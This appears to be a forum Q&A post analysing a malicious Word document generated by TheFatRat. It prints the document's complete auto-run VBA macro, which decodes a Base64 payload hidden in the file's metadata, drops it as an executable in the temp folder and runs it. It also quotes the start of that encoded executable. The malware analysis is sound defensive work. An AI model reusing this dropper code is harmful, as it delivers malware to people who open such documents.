TheFatRat Microsoft reverse shell 文档中的 Base64 代码在哪里?

Where is Base64 code in TheFatRat Microsoft reverse shell document?

我用 TheFatRat 创建了一个反向 shell Microsoft Word 文档,它主要创建反向 shells!

现在,我想对其进行逆向工程,所以我提出了 REMNUX(Ubuntu 和一些逆向工程工具)。

我使用了 oledump.py 并且输出是:

remnux@remnux:~$ oledump.py kjbk.docm
A: word/vbaProject.bin
 A1:       385 'PROJECT'
 A2:        71 'PROJECTwm'
 A3: M    5871 'VBA/NewMacros'
 A4: m    1073 'VBA/ThisDocument'
 A5:      4400 'VBA/_VBA_PROJECT'
 A6:       734 'VBA/dir'

A3 部分有这些宏:

remnux@remnux:~$ oledump.py kjbk.docm -v(解压缩) -s A3

Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long

Sub AutoOpen()
    On Error Resume Next
    Dim found_value As String

    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            found_value = Mid(prop.Value, 56)
            orig_val = Base64Decode(found_value)
            #If Mac Then
                ExecuteForOSX (orig_val)
            #Else
                ExecuteForWindows (orig_val)
            #End If
            Exit For
        End If
    Next
End Sub

Sub ExecuteForWindows(code)
    On Error Resume Next
    Set fso = CreateObject("Scripting.FileSystemObject")
    tmp_folder = fso.GetSpecialFolder(2)
    tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
    Set f = fso.createTextFile(tmp_name)
    f.Write (code)
    f.Close
    CreateObject("WScript.Shell").Run (tmp_name)
End Sub

Sub ExecuteForOSX(code)
    System ("echo """ & code & """ | python &")
End Sub


' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
  'rfc1521
  '1999 Antonin Foller, Motobit Software, http://Motobit.cz
  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  
  base64String = Replace(base64String, vbCrLf, "")
  base64String = Replace(base64String, vbTab, "")
  base64String = Replace(base64String, " ", "")
  
  dataLength = Len(base64String)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "Base64Decode", "Bad Base64 string."
    Exit Function
  End If

  
  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    numDataBytes = 3
    nGroup = 0

    For CharCounter = 0 To 3

      thisChar = Mid(base64String, groupBegin + CharCounter, 1)

      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
        Exit Function
      End If

      nGroup = 64 * nGroup + thisData
    Next
    
    nGroup = Hex(nGroup)
    
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    
    sOut = sOut & Left(pOut, numDataBytes)
  Next

  Base64Decode = sOut
End Function

它显然解码了一些 Base64 代码和 运行 它,问题是,我在任何这些 A1 上的这个文件上找不到任何 Base64(反向 shell 代码)... A6零件。那么反向 shell 代码在哪里?

我已经将文件上传到这些位置,密码是 123,它创建反向 shell 到本地网络 (192.168....) 所以它是无害的。

Link1, Link2 , Link3

让我们在忘记之前回答它,我敢打赌 TheFatRat 开发人员对此分析不满意,但我找到了反向 shell 代码。

与 Emotet 恶意软件不同,Base64 代码无法被 oledump(仅查看受感染文档的 word 目录)等工具检测到,并且它不会隐藏在主文档 XML 文件中,我确实打开了带有 Ubuntu Archive Manager 和 voilà 的 Microsoft Word 文件:

可执行文件隐藏在docProps目录中!它是 Base64,它包含反向 shell 代码!它将复制到 Windows 临时文件夹。

它的第一行:

<cp:coreProperties>
<dc:title/>
<dc:subject/>
<dc:creator/>
<cp:keywords/>
<dc:description>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAA